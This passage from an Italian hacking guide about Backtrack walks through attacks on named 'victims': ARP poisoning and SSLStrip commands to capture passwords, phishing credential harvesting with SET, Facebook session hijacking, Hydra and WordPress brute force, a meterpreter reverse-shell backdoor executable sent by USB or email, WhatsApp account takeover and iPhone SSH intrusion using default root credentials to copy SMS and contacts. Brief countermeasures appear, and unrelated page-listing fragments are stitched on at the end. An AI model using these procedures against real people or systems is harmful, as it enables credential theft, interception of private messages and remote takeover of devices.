69 sostanzialmente per ottenere l indirizzo ip dei dispositivi connessi. Per farla funzionare, basta eseguire questi comandi da terminale: nmap -sp -PT80 <Indirizzo ip di partenza-intervallo> Per esempio: nmap -sp -PT Cosi facendo si scansione l intera rete Se invece si vuole una ricerca delle porte aperte per host,basta digitare: nmap <indirizzo ip> Vedi immagine successiva Un altro programma davvero utile a riguardo a Kismet (http://www.kismetwireless.net/); questo software è creato appositamente per le reti Wifi e permette di ottenere molti dati a 69

70 riguardo. Per farlo partire basta digitare da terminale kismet e alla domanda Start Kismet Server, premere yes con il tasto invio. Oltre a Xplico, per visualizzare in chiaro le conversazioni presenti su Facebook, è possibile farlo con un programma non presente in Backtrack, ma disponibile su Internet. Per trovarlo basta digitare su google borogove.py. Una volta scaricato e copiato nella cartella root, basta aprire il terminale e digitare il seguente comando: python borogove.py <scheda di dire> <ip vittima> <ip rotuer> Per esempio python borogove.py wlan Ora le conversazioni, sarà visualizzate sulla schermata. 70

71 Quando si richiede di inserire l interfaccia di rete che si vuole utilizzare, basta digitare quella della periferica Wifi (basta digitare ancora un vola iwconfig da terminale per scoprire quale sia, per esempio wlan0) Dopo aver dato il comando di invio, il programma ricerca tutte le rete nelle circostanze, per una successiva intrusione. Per cui invece vuole effettuare una operazione simile ma non con Backtrack, può fare in questo modo. Quello che sta per essere illustrato, in teoria sarebbe potuto essere inserito nel capitolo precedentemente per la ricerca del bersaglio per craccare una rete Wifi, però è stato inserito in questo capitolo perchè è collegato all operazione di analisi di una rete, per capire ancora una volta come è composta un LAN e quindi agire di conseguenza. 71

72 Se si vuole creare una mappa di tutti le reti presenti nei propri comuni, il compito non è difficile. Ecco cosa si ha bisogno: Notebook con periferica Wifi e modulo Bluetooth Ricevitore GPS Bluetooh Un programma tra inssider 2 o Kismac Google Earth per visualizzare la loro posizione Dopo aver installato un programma tra inssider 2 (per Windows) o Kismac (per Mac os) si accende il ricevitore GPS e lo si collega al PC seguendo la semplice procedura di aggiunta di periferica bluetooth; una volta effettuato il collegamento si apre il programma di mappatura si seleziona il modulo e la sua porta com e si preme il tasto start. Adesso muniti di una macchina, effettuando un giro nella zona che si vuole descrivere sarà possibile schedare tutte le rete Wifi, sia protetta da password wpa2, wpa, wep, sia quelle libere, per avere una idee di dove è possibile connettersi ad internet, o anche solo per una curiosità statistica. Questo processo prende il nome di wardriving. 72

73 Ecco un esempio di scansione con inssider. Insomma per analizzare una rete c è davvero l imbarazzo della scelta. 73

74 74

75 Nei capitolo precedenti abbiamo visto come sia possibile entrare in una rete e avere una idea delle periferiche connesse ad essa. In questo capitolo verranno analizzate le tecniche per poter rubare le password, che vengono utilizzate nel LAN. Il primo programma che verrà illustrato è Ettercap (http://ettercap.sourceforge.net/) Questo programma è uno sniffer cioè intercetta i pacchetti presenti nella rete e li analizza. Innanzitutto, dal momento che la maggior parte dei protocolli utilizzati per accedere ad aree riservate è SSL, bisogna fare una piccola modifica al file di Ettercap. Per farlo basta cambiare alcuni linee di comando. Da terminale: nano /usr/local/etc/etter.conf e sostituiamo # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" in 75

76 if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" In poche parole dobbiamo togliere # dal file. Ora siamo pronti per aprire il programma, che può essere utilizzato sia in modalità grafica, che da terminale. Per avviarlo digitiamo da terminale: sudo ettercap -G Impostiamo il programma andando in Sniff-Unified sniffing, selezionando la periferica che utilizziamo per connetterci alla rete. Il passo successivo è quella di fare una scansione della rete. 76

77 Ora ci spostiamo nella tab Hosts e facciamo una scansione, per visualizzare le periferiche connesse alla rete. Dopo pochi secondi, saranno presenti tutti i dispositivi connessi alla LAN, con i relativi ip. 77

78 Ora selezioniamo l indirizzo del Router (di solito è quello che finisce con 1 come ip, nel nostro caso è ) e lo impostiamo come add to target 1, mentre il PC da attaccare, lo selezioniamo come Target 2. 78

79 Ora andiamo in Mitim, e selezioniamo ARP poisoning, per impostare il tipo di attacco (Man in the middle). Come ultima operazione facciamo parte l attacco, cliccando su Start-Sniff. Ora aspettiamo che la vittima inserisca i dati che ci servono e il gioco è fatto! Il nome utente e le password, verranno mostrate nella zona inferiore del programma. Anche questa operazione non è affatto complicato, ma risulta essere molto pericolosa in caso la vittima sia connessa ad una rete pubblica, dove le informazioni non sono protette. 79

80 Oltre a Ettercap esiste un altra applicazione, che si chiama SSLStrip che svolge lo stesso tipo di attacco (Man in the Middle), ma sfruttando un vero e proprio re-indirizzamento del traffico generato da un PC della vittima a quello dell attaccante. Ora vedremo in pratica cosa dovremo fare. Da terminale apriamo una nuova sessione e digitiamo sudo echo 1 > /proc/sys/net/ipv4/ip_forward (Questo serve per instradare i pacchetti), dove ip_forward è quello del nostro PC. sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

81 Questo serve per i pacchetti con cifratura, cioè quelli che sfruttano la porta 443 e 80. sudo arpspoof -i wlan0 ip_vittima ip_router Ovviamente wlan0 è la periferica da cui si sta facendo l attacco, mentre ip_vittima e ip_router vanno sostituiti con quelle che fanno al nostro caso. sslstrip -a -l w file.log -a registra il traffico cifrato e non che proviene e viene mandato al server -l specifica la porta su quale SSLStrip deve stare in ascolto -w specifica il file con estensione log dove viene salvato tutto l'output,nel nostro caso file.log Per visualizzare il documento file.log, essendo scritto nella stessa cartella in cui ci troviamo, basta digitare: cat file.log cat è il comando usato in Linux per visualizzare il testo di un file. Ora passeremo ad un programma più semplice da usare. Infatti parleremo di fake login, termine americano che significa accesso fasullo. Questo strumento ci permetterà di ottenere l accesso a molti account di posta elettronica,facebook etc... in modo davvero semplice. In poche parole attraverso un programma presente su un PC, simulando un sito simile all originale, la vittima inserirà nome utente e password, che verranno inoltre sul primo computer, mentre 81

82 la vittima continuerà a navigare sul sito nel quale ha inserito le credenziali di accesso. Ora passiamo alla pratica! Il programma da utilizza si chiama Set ed è presente in Backtrack. Per avvialo basta andare in Backtrack-Exploitation Tools-Social Engineering Tools-Social Engineering Toolkit-set. 82

83 Il programma si utilizza da terminale, ma risulta essere da verro semplice da utilizzare. Il passo successivo è quello di impostare l attacco. Per prima cosa si seleziona 1 e si preme invio. Con questa scelta abbiamo indicato di utilizzare un SocialEngineering Attacksg. In seguito digitiamo 3 e invio per selezionare Credential Harvester attack Method, Nella parte in altro del 83

84 terminale, ci viene mostrata una descrizione dei tipi di attacco da utilizzare, per imparare tutte le possibili mosse, per avere piena conoscenza di quello che si sta facendo. Il passo successivo e quello di digitare 1 e premere invio, per utilizzare un Web Templates già presente in Backtrack; tuttavia possibile copiare il contenuto di un sito, digitando invece 2 (site cloner) e scrivere il nome del sito, per esempio facebook.cok. Una volta fatto ciò, selezioniamo il tipo di sito per cui si vuole rubare le credenziali di accesso. Nel nostro caso faremo 4 e invio. 84

85 Ora è stato correttamente impostato il programma set. Il passo successivo è quello di conoscere il l indirizzo ip della macchina da cui si sta facendo l attacco; per scoprirlo facciamo iwconfig e troveremo la nostra riposta. Ora basta indurre la vittima ad aprire un link, contente l indirizzo ip, mascherandolo magari con un codice html o uno shortlink e il pc sotto attacco mostrerà sul monitor un sito totalmente identico a quello che la vittima pensa di essere collegata, la quale inserirà nome utente e password e il gioco è 85

86 fatto! Infatti ora avremo sulla schermata del nostro terminale tutti i codice che ci servono per poter aver accesso all account che ci interessa! In gioco da ragazzi! Questo attacco è stato illustrato per poter essere utilizzato dove la vittima si trovi nella stessa rete locale. Tuttavia è possibile farlo anche da remoto, impostando correttamente il PC attaccante, in modo tale da poter essere raggiunto fuori dal LAN; impostando le porte 80 e 443 del nostro router ( il termine di questa operazione è port forwarding) Questa applicazione ha tantissime funzionalità, che vedremo nei prossimi capitoli. 86

87 Se anche questa procedura di fake login dovesse essere complicata, ma non lo è davvero, c è una soluzione davvero spaventoso a causa della facilità con cui sia possibile entrare in account di Facebook. Questa applicazione è disponibile solo per cellulare Android, è si chiama Faceniff (http://faceniff.ponury.net/). Essa funziona solo su cellulari rooted cioè con i privilegi massimi per cellulari. Per farlo basta fare una ricerca su google del programma SuperOneClick.exe. L applicazione funziona su qualsiasi tipo di rete Wifi, libera o con protezione. Una volta scaricata (è disponibile l applicazione lite e quella al prezzo di 4 $), basta pigiare sul tasto start e tutti gli account di persone connesse nella stessa rete (WLAN), verranno rubati e si potrà avere accesso a tantissimi servizi. Ecco quelli supportati: 87 FaceBook

88 Twitter Youtube Amazon VKontakte Tumblr MySpace Tuenti MeinVZ/StudiVZ blogger Nasza-Klasa In basso si vedranno gli account rubati e per visualizzare la parte riservata, basta cliccare. Risulta fin troppo semplice questa operazione! 88

89 Questo meccanismo funziona alla perfezione negli Hotspot pubblici, dove le informazioni non sono sicure e pertanto è possibile acquisire tantissime informazioni (messaggi privati e tanto altro) in maniera semplice. Questo programma sfrutta il fatto che le sessioni di facebook, lasciano dei cookies cioè dei pacchetti che permettono di accedere più velocemente ad un sito già visionato. Copiando questi file testo, per il server di facebook, risulterà 89

90 accettabile la richiesta di Faceniff per poter visualizzare un account di Facebook, con gli stessi cookies e con lo stesso ip pubblico. Tutte le procedure precedenti funzionano con qualsiasi tipo di password; non cambia se essa è *! &/// Il prossima programma, invece, sfrutta un attacco bruteforce per ottenere accesso, per esempio, alla pagine di controllo del router, di cui non si conosce nome utente e password. Il programma di chiama Hydra. Essa è disponibile sia da terminale, che in formato grafico. Dopo aver aperto l applicazione Hydra avremo una schermata di questo tipo. Nella prima tab, dovremo indicare l indirizzo ip del router da attaccare (di solito è ), selezionando il tipo di attacco (http-get) e nella tab successiva, passwords, indichiamo dove si trova il dizionario (che abbiamo scaricato da google). Dopo aver finito di impostarlo, basta andare nell ultima tab, facendo partire l attacco bruteforce. Il tempo impiegato varia da pochi secondi a ore o all infinito se la password non è contenuta nel dizionario. 90

91 Questa tecnica si utilizza, se la password è stata modificata rispetto a quella di default. In caso contrario, basta sapere il modello del router ed è possibile risalire alle credenziali d accesso in pochi secondi. Per avere una lista basta andare all indirizzo digitando la marca del modello del Router (vedi programma autoscan) 91

92 Tutte le procedure elencate, funzionano in qualsiasi tipo di rete, specialmente quelle senza fili, dove non si è costretti ad essere vicini al router, ma anche in una zona nascosta, per poter effettuare un attacco senza essere scoperti. Funzionano ancora di più negli Hotspot Wifi, dove molte persone accedono ad aree riservate con password, che sono facili da rubare (vedi i vari programmi elencati precedentemente) Contromisure Ecco una serie di contromisure per evitare blindare le passowrd: 1. Proteggere la propria rete Wifi, come è stato detto nel capitolo 3 2. Utilizzare il più possibile il cavo di rete per connettersi ad 92

93 Internet 3. Navigare su siti https, cioè cittografati 4. Usare se possibile una VPN (Virtual Private Network) evitando così intercettazioni di pacchetti da remoto 5. Disconnettersi ogni volta che si ha finito di navigare su una pagina protetta 6. Evitare di accedere a portali di accesso in Hotspot Wifi Inolte per Facebook è possibile attivare una ulteriore protezione; eccola. Molti non sanno che Facebook non sfrutta il protocollo sicuro SSL (Secure Sockets Layer) a 128 bit, ma utilizza la normale porta 80 per connettersi al noto social network. Per dir la verità non è chiaro perchè non venga adottato di serie nei profili degli utenti. 93

94 In ogni caso è possibile attivare questa funzionalità nella sezione impostazioni account -protezione-navigazione protetta e bisogna attivarla. In questo modo è possibile navigare in sicurezza sul noto social network, in modo che il traffico non venga intercettato da possibili cracker, specialmente in posti pubblici (vedi hotspost wifi). In ogni caso conviene controllare che il sito in cui navighi sia https://www.facebook.com 94

95 95

96 Nel capitolo 4, ho parlato più di una volta dell importanza delle porte di comunicazione aperte su un determinato PC connesso ad una rete locale; In questo capitolo capirete il motivo di questa sottolineatura. Il primo programma che vedremo si chiama Fasttrack, raggiungibile andando in Backtrack-Exploitation ToolsNetwork Exploitation Tools-Fast-track-fasttrack ineractive. Ora digitiamo 2, per selezionare Autopwn Automation 96

97 Qui abbiamo varie opzioni. Se abbiamo un unico bersaglio, basta digitare il suo indirizzo ip di rete, seguito dal comando invio 97

98 Ora abbiamo due possibili scelti, bind e reserve. Queste due configurazioni, stanno ad indicare semplicemente, se abbiamo intenzione di collegarci noi direttamente al pc della vittima ( bind ) o fare l opposto, cioè fare in modo che sia lui che si connetta al nostro dispositivo. bind= connessione diretta al server (pc della vittima) reverse= connessione che viene generata direttamente dall altro server. Dopo qualche minuto, se l attacco avrà avuto esito positivo, si potrà accedere direttamente dal terminale nel pc della vittima. 98

99 Backdoor Se questo attacco non fosse riuscito, è possibile eseguirne uno simile attraverso un paylod all interno di un comunissimo file con estensione.exe. Per farlo apriamo da ci spostiamo nella cartella dove è presente il programma set. L opzione da digitare è 1 per selezionare un attacco di ingegneria sociale 99

100 L opzione da digitare è la 4, per selezionare create a Payload and Listener. 100

101 Successivamente si digita il comando 2, per selezionare un attacco di tipo WindwosReverse_TCP terpreter. Il termine TCP, sta ad indicare che è un tipo ti porta che serve per comunicare, cioè inviare i dati (ecco perchè le porte all interno di una rete svolgono un ruolo importante in un attacco di rete). 101

102 Ora creiamo un Backdoor, cioè un file che permette di eludere le protezioni presenti in un PC. Digitiamo 16, seguito dalla porta nella quale siamo in ascolto (443). 102

103 Dopo pochi instanti incomincerà a generare il file, che permetterà di aprire le porta del PC attaccato. 103

104 Ora il file con estensione è stato generato e si trova nella cartella pentest/exploits. Il nome del file è msf.exe. Ora il compito è quello di trasferire questo file nel pc della vittima, attraverso vari modi; per esempio fisicamente attraverso una pen drive o per posta elettronica (non con GMAIL perchè blocca l invio di file.exe, per motivi di sicurezza!). Una volta che questo file viene avviato dal PC della vittima, siamo davvero vicino al nostro obiettivo. Ora ci spostiamo nella cartella dove si trova l eseguibile./msfconsole digitando da terminale 104

105 cd /opt/framework/msf3./msfconsole Ora digitiamo: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp 105

106 Ora selezioniamo l indirizzo ip della vittima, digitando semplicemente: set lhost indirizzo_ip_della_vittima 106

107 Ora selezioniamo la porta che abbiamo indicato nella fase precedente: set lport

108 Ora diamo il comando exploit per fare partire l ultimo attacco. Ora siamo dentro al pc! Sarà possibile avere una schermata e utilizzare il terminale della vittima. 108

109 109

110 Forse l aspetto più interessante e affascinante di Internet, che esso stesso è una grande rete locale. In sostanza il ruolo dei registri, usando un termine calcistico, viene fatto dai router. Essi hanno il ruolo di far visitare una particolare pagina web richiesta da un pc interno alla rete locale, con più dispositivi. Perciò il router ha il ruolo di NAT, ovvero smista il traffico proveniente dall esterno WAN verso l interno e viceversa. Quindi si è solito assegnare ip privati del tipo x.x, mentre quelli esterni, per esempio di un sito internet possono essere molto vari. Lo stesso router, che internamente viene raggiunto attraverso l ip, per esempio, , all esterno viene raggiunto attraverso un ip totalmente diverso. Ma come si può ottenere un ip remoto di una persona? Questa domanda sembra abbastanza importante, se si pensa a gli attacchi informatici che quotidianamente affliggono vari pc. Nel caso volessimo conoscere l ip pubblico della nostra connessione, basta semplicemente digitare su google my ip e si apre uno dei primi risultati e si otterrà il codice. 110

111 Ovviamente il codice comparirà totalmente, non come l immagine soprastante, oscurata per motivi di privacy. Ma se invece volessimo sapere l ip di un nostro amico? La cosa si complica leggermente, ma non troppo. La situazione diventa semplice se quest ultimo ha mandato un a noi. In questo caso, sarà possibile ricavare l ip. In altri casi, occorrerà trovare qualche modo, affinché risponda ad un nostro messaggio di posta elettronica. Come primo passo, occorre aprire l in questione e cercare la voce mostra sorgente, che si trova in quasi tutte le webmail. Una 111

112 volta copiato il testo, occorre incollarlo in questo sito: Una volta completata la procedura, basterà premere il comando trace sender. Ora comparirà la localizzazione geografica dell ip in questione. Ora sarà possibile trovare eventuale falle nel sistema, come porte aperte, oppure modificare il firmware del router, in modo da instradare il traffico verso un nostro server, per visualizzare alcune informazioni. 112

113 Un interessante articolo tratto dal blog oversecurity, informa di una grave falla che permette, appunto, di reindirizzare il traffico di un utente Alice, su un server esterno. Una nuova ed imponente vulnerabilità affligge i router di Telecom Italia, marchiati Alice Gate AGPF, a scoprire la nuova falla è stato Emilio Pinna del team BackBox. La vulnerabilità permette ad un utente malintenzionato di acquisire il pieno controllo del router in maniera permanente con gravi conseguenza sulla privacy dell utente, una volta acquisito l accesso al router l attaccante potrà: Intercettare i siti visitati dall utente e redirezione verso siti copia fasulli per rubare credenziali di mail, social network, home banking, etc modificando i record del DNS; Ascoltare le chiamate telefoniche, telefoni analogici compresi, sostituendo l indirizzo del server VoIP ufficiale con quello di uno preparato per le intercettazioni; Instradare tutto il traffico verso una macchina dell attaccante allo scopo di analizzare il traffico e sottrarre dati sensibili; Aprire dei pannelli di controllo del router verso internet con il quale l attaccante mantiene l accesso remoto al router nel tempo, con una interfaccia web esposta verso internet e tracciata via dns dinamico. Secondo una prima stima approssimativa sui 9 milioni di clienti di Telecom Italia il 25% è in possesso del modem vulnerabile, circa 2 113

114 milioni di clienti sono vulnerabili all attacco mettendo gravemente a rischio la privacy degli utenti. È possibile ottenere il pieno controllo del router grazie alla presenza di due vulnerabilità nel software che opportunamente sfruttate in conseguenza danno accesso ai parametri interni, in primis il parametro HTTPstack_set della pagina admin.cgi dell interfaccia web permette di riscrivere qualsiasi parte della configurazione interna del router (vulnerabilità comunemente sfruttata dal legittimo proprietario del router per sbloccare funzionalità nascoste). Inoltre il router di Alice non offre nessuna protezione contro gli attacchi CSRF: pubblicando una semplice pagina appositamente preparata si può forzare il browser dell utente che la visita ad effettuare una richiesta HTTP post verso l interfaccia web del router. In pratica per sferrare l attacco è necessario effettuare una particolare richiesta HTTP all URLhttp:// /admin.cgi con la quale è possibile riscrivere completamente la configurazione interna del router, ipotizzando un attacco su larga scala un utente malintenzionato potrebbe pubblicare una porzione di codice HTML in una pagina internet molto trafficata e in poche ore trovarsi una botnet di Router a propria disposizione. Emilio ha reso disponibile una pagina per verificare 114

115 autonomamente se il proprio router Alice ADSL è vulnerabile, inoltre per chi volesse approfondire gli aspetti tecnici è disponibile la Full Disclosure. 115

116 116

117 Wordpress è una delle soluzioni per creare siti internet anche professionali, più conosciuta negli ultimi anni. Grazie alla sua facilità di utilizzo e di gestione, ha avuto un grosso successo tra i vari bloggers di questo mondo. In questo capitolo vedremo come è possibile eludere la sicurezza di questo servizio, utilizzando un programma che si chiama Digitiamo da terminale per aprire il programma wpscan; cd /pentest/web/wpscan L operazione successiva è quella di scrivere: ruby./wpscan.rb --url wordpress dove al posto di wordpress scriviamo il sito nel quale vogliamo entrare 117

118 ruby./wpscan.rb --url wordpress --enumerate p ruby./wpscan.rb --url 1wordpress --enumerate u Questi ultimi due comandi, servono essenzialmente per conoscere tutte le possibilità vulnerabilità che sono presenti in questo database. Una volta finito di eseguire l operazione da terminale, si avrà un elenco delle possibili falle, che possono essere utilizzate per un eventuale attacco. Il passo successivo dipende da quello precedente, poichè per ogni falla c è un operazione da fare. Il generale è possibile effettuare un attacco brutefoce, utilizzando un dizionario che è possibile reperire da internet. Per farlo basta digitare: ruby./wpscan.rb --url wordpress --wordlist *your file* --username *user account* dove al posto di your file bisogna inserire l indirizzo dove è presente il dizionario. 118

119 119

120 WhatsApp è uno dei più famosi servizi che permette di inviare messaggi gratuiti tra gli utenti mobile, attraverso una semplice connessione ad Internet. Non occorre neanche effettuare una registrazione, poiché vengono sfruttate, come credenziali, il numero di cellulare. Sebbene a prima vista, questa soluzione sembra comoda, in realtà è alla base di un importante falla di sicurezza del servizio. La password che viene generata, non è così casuale come sembra. Infatti essa si calcola attraverso un reverse, semplicemente conoscendo il mac address WiFi del proprio cellulare, oppure direttamente il codice IMEI. Quindi, se uno riuscisse a conoscere il l indirizzo fisico della scheda di rete, è possibile far credere ai server di WhatsApp, di essere un altra persona e quindi leggere e scrivere messaggi. Ecco come si svolge nella pratica un possibile attacco di questo tipo. Facciamo il caso, per capire meglio i vari passaggi, che il numero di cellulare sia (un numero a caso) e l indirizzo della scheda WiFi dell iphone della vittima sia AA:BB:CC:DD:EE:FF. Come si può ottenere questo codice? In realtà è molto semplice, occorrono semplici programmi di scansioni delle reti, quali NMAP e Autoscan. Da quest ultimo, basta vedere i dispositivi Apple presenti, per esempio in un Hotspot pubblico e si copia il codice da qualche parte. Ora facciamo il reverse dal mac address per ottenere il codice MD5. Usiamo per esempio questo sito online, che permette il 120

121 calcolo velocemente. Ora per testare la vulnerabilità, basta aprire un browser con questo link https://r.whatsapp.net/v1/exist.php? cc=$countrycode&in=$phonenumber&udid=$password Dove al posto di countrycode occorre inserire 39, senza + oppure 00, phonenumber è il numero telefonico, e password è quella che abbiamo ottenuto attraverso la generazione del MD5. Se tutto è andato bebe, troveremo una schermata simile a questa, con la dicitura ok. 121

122 Notate immediatamente che l esito dello stato è OK il che conferma che avete ottenuto l accesso al vostro account, se invece la password generata o l utente non è riconosciuto dal servizio di messaggistica apparirà la dicitura FAIL. Con la stessa identica metodologia, invio di variabili GET su PHP, possiamo inviare messaggi ad utenti WhatsApp o verificare se ci sono messaggi non letti. Per automatizzare la procedura ci viene in soccorso uno script denominato WhatsAPI, che ha seguito di direttive da parte della stessa società di messaggistica istantanea non è più disponibile sul circuito GitHub, ma comunque attraverso file hosting ( occorre cercare su google ) WhatsAPI ci permette quindi di testare la sicurezza di WhatsApp rendendo possibile l invio di messaggi e la relativa ricezione attraverso il nostro PC anziché sullo Smartphone, lo script è di estremo utilizzo e richiede l installazione di PHP sulla nostra distribuzione. Terminato il download di WhatsAPI estraiamo il contenuto e dirigiamoci nella cartella test in essa troveremo un unico file denominato whatsapp.php. Apriamolo con editor di testo ed 122

123 inseriamo i dati, che abbiamo ottenuto nei passaggi precedenti, in queste righe: $nickname = WhatsAPI Test ; $sender = ; // Mobile number with country code (but without + or 00) $imei = AA:BB:CC:DD:EE:FF ; // MAC Address for ios IMEI for other platform (Android/etc) Ora salviamo il file e apriamo da terminale il programmino digitando: $ php whatsapp.php Dopo aver digitato, si aprirà l help di questo programma, per capire come usarlo. Noi, abbiamo varie possibilità: leggere gli sms della vittima, oppure inviarne uno, come se fossimo la vittima! Ovviamente è illegale tutto ciò, ma come potete vedere è davvero semplice e non richiede troppe skill. Digitiamo da terminale per leggere i messaggi 123

124 php whatsapp.php -i Ecco alcune screenshot tratte da oversecurity Se invece voglia inviare messaggio ad un atra persona, come se fossimo la vittima occorre digitare: php whatsapp.php -s numero di cellulare ricevente testo del messaggio 124

125 In conclusione WhatsApp è vulnerabile, qualsiasi persona può sostituirci in una conversazione conoscendo esclusivamente il nostro codice IMEI. Si possono inviare e ricevere risposte senza che il destinatario si accorga di nulla e ancor più gravoso neanche il mittente (utente vulnerabile) avrà la ben cheminima traccia di quanto accaduto, nella sua cronologia di chat non solo non appariranno i messaggi inviati ma neanche quelli in risposta. 125

126 126

127 127

128 SMS e dati personali sott attacco! L iphone è diventato il cellulare più venduto e usato al mondo, grazie alla sua semplicità d utilizzo, alle sue funzionalità e alla sua alta sicurezza ( o quasi ). A causa, però, delle rigide imposizioni da parte di Apple sulle applicazioni presenti su AppStore, nel corso degli anni è nato un nuovo store che si chiama Cydia. Qui è possibile trovare tweak e applicazioni che aggiungono nuove funzionalità al dispositivo. L unica difficoltà per avere queste features è lo sblocco del terminale. Tuttavia, seguendo le procedure disponibili su Internet, è possibile effettuare lo sblocco con pochi click. Tra i tweak presenti, è possibile trovare Open SSH, che permette di utilizzare tale protocollo, per trasferire facilmente grossi file, senza utilizzare itunes. Il problema principale di questa estensione è che durante la fase d installazione, non è possibile cambiare le credenziali d accesso all iphone, ma rimangono quelle di default. Solo successivamente, su volontà dell utente è possibile modificarle. Il pirata, dopo aver individuato se il dispositivo è vulnerabile, accede all iphone con la password di default e copia i database contenenti sms, contatti e immagini. Poi li apre con un programmino ed è in grado di leggere praticamente tutto! Per fortuna è possibile rimediare a questo problema, cambiando le credenziali d accesso. Le screenshot si riferiscono a programmi Windows, ma che sono sempre disponibili in Linux e Backtrack. Come prima operazione, il pirata utilizza un programma per trovare le periferiche connesse ad una rete WiFi pubblica. Il software si 128

129 chiama NMAP ed è possibile scaricarlo da questo link. Questo programma fa una scansione della rete WiFi a cui si è connessi e mostra la marca delle periferiche connesse. Ora il malintenzionato apre il programma e fa partire la scansione, premendo il comando scan. Ora gli basta aspettare qualche istante e troverà tutte le periferiche connesse alla rete. Si annota gli indirizzi ip e li inserisce nella voce target per individuare l'iphone. Questo tipo d'attacco funziona anche se l'iphone è connesso ad Internet con il 3G. In questo caso, il pirata, cercherà di ricevere un' dalla vittima e copierà il sorgente del messaggio e lo incolla in questo sito. Dopo pochi instante troverò l'indirizzo ip. 129

130 Ora che l'hacker conosce l'indirizzo ip, prova a vedere se è attivo il servizio SSH sull'iphone, semplicemente usando sempre il programma NMAP, dopo aver digitato l'indirizzo ip dell'iphone sotto la voce target. Se la porta 22 è aperta, allora l'attacco è possibile farlo. In caso contrario, cercherà un'altra vittima. Il pirata, dopo aver individuato l'indirizzo ip della vittima e verificato la vulnerabilità, utilizza un programma per accedere in SSH al dispositivo, come ad esempio CyberDuck e aggiunge il dispositivo, attraverso il pulsante nuova connessione. Il nome utente e la password sono root e alpine. Ora può vedere tutti i dati della vittima! 130

131 All'interno dell'iphone è possibile trovare tante cartelle; il pirata sa quale sono le più importanti. Ecco quali: SMS /private/var/mobile/library/sms Notes backup /private/var/mobile/library/notes Call History backup /private/var/mobile/library/callhistory Voic backup /private/var/mobile/library/voic Voic s are stored as 1.amr, 2.amr, within this directory. The 131

132 custom greeting is stored as Greeting.amr Contacts/Address Book backup /private/var/mobile/library/addressbook/ Mail backup /private/var/mobile/library/mail Pictures and Video Recordings /private/var/mobile/media/dcim/ Calendar backup /private/var/mobile/library/calendar/ 132

133 Ora che il pirata ha copiato, per esempio il file sms.db, apre il programma SQL e seleziona il file appena copiato. Ora potrà vedere in chiaro i messaggi della vittima. Un gioco da ragazzi per lui! Come detto precedentemente l'attacco funziona solo se l'iphone ha attivo il servizio SSH e la sua passoword non è stata modificata. Per cambiare le credenziali d'accesso, occorre aprire il terminale 133

134 dall'iphone e digitare passwd e digitare la nuova parola. Ora saremo sicuri da eventuali attacchi di questo tipo. Come potete vedere, è facile leggere gli SMS di una persona, sfruttando le sue disattenzione. Per altri attacchi di questo tipo, è disponibile una sezione in Backtrack 5 R3, sotto la voce Smartphone-Pentest-Framework. 134

Alla scoperta di Backtrack L OS degli

Alla scoperta di Backtrack L OS degli Prima edizione Alla scoperta di Backtrack L OS degli Hacker Di Giacomo Bellazzi Questo libro parla del sistema operativo Backtrack, che si focalizza sulla sicurezza dei computer ed è disponibile sia come

Dettagli

Alla scoperta di Backtrack L OS degli Hacker

Alla scoperta di Backtrack L OS degli Hacker Prima edizione Alla scoperta di Backtrack L OS degli Hacker Di Giacomo Bellazzi Questo libro parla del sistema operativo Backtrack, che si focalizza sulla sicurezza dei computer ed è disponibile sia come

Dettagli

Man In The Middle & SSL Attack

Man In The Middle & SSL Attack Man In The Middle & SSL Attack Autore: Duffabio Provenienza: http://duffabio.altervista.org/ Ringrazio BlackLight perchè per la teoria mi sono basato sulle sue guide visto che è da li che ho studiato la

Dettagli

Networking Wireless con Windows XP

Networking Wireless con Windows XP Networking Wireless con Windows XP Creare una rete wireless AD HOC Clic destro su Risorse del computer e quindi su Proprietà Clic sulla scheda Nome computer e quindi sul pulsante Cambia Digitare il nome

Dettagli

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme.

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme. Visio Wifi Setup - Windows Rev. 1.0.0 Prerequisiti: Prima di procedere con l installazione assicurarsi di avere pieno accesso alla configurazione del router Wifi. Attenzione: non tutti i router risultano

Dettagli

Internet gratuita in Biblioteca e nei dintorni

Internet gratuita in Biblioteca e nei dintorni Internet gratuita in Biblioteca e nei dintorni Per la navigazione è necessaria l iscrizione preventiva in Biblioteca, sia al Servizio Bibliotecario sia a quello internet Per poter accedere a Internet tramite

Dettagli

Craccare una rete WPA2 tramite pin WPS

Craccare una rete WPA2 tramite pin WPS Craccare una rete WPA2 tramite pin WPS Il sistema WPS è nato per facilitare l'uso delle reti Wi-Fi soprattutto da parte dei meno esperti, e serve ad attivare il collegamento tra host e client tramite un

Dettagli

DIFENDIAMO LA NOSTRA WLAN

DIFENDIAMO LA NOSTRA WLAN DIFENDIAMO LA NOSTRA WLAN Scritto da Matteo Giardino Le WLAN (Wireless Local Area Network) sono tutte quelle reti dove gli hosts (ovvero i computer che fanno parte della rete) sono collegati fra di loro

Dettagli

Installare un nuovo programma

Installare un nuovo programma Installare un nuovo programma ICT per la terza età Le video lezioni della Fondazione Mondo Digitale Diapositiva Introduzione Installare un nuovo programma sul computer installazione Quando acquistiamo

Dettagli

pod Guida all installazione di rete del Solstice Pod Introduzione Solstice Pod Collaborazione Visuale Wireless Solstice sulla vostra rete

pod Guida all installazione di rete del Solstice Pod Introduzione Solstice Pod Collaborazione Visuale Wireless Solstice sulla vostra rete Introduzione Solstice Pod Collaborazione Visuale Wireless Una volta installato, il Solstice Pod permette a più utenti di condividere simultaneamente il proprio schermo su un display tramite la rete Wi-Fi

Dettagli

Localizzare reti WiFi con Kismet e inssider www.html.it...

Localizzare reti WiFi con Kismet e inssider www.html.it... http://www.readability.com/articles/mjtgueg6 html.it Localizzare reti WiFi con Kismet e inssider by ANDREA DRAGHETTI Kismet e inssider sono due software in grado di rilevare reti wireless, di verificarne

Dettagli

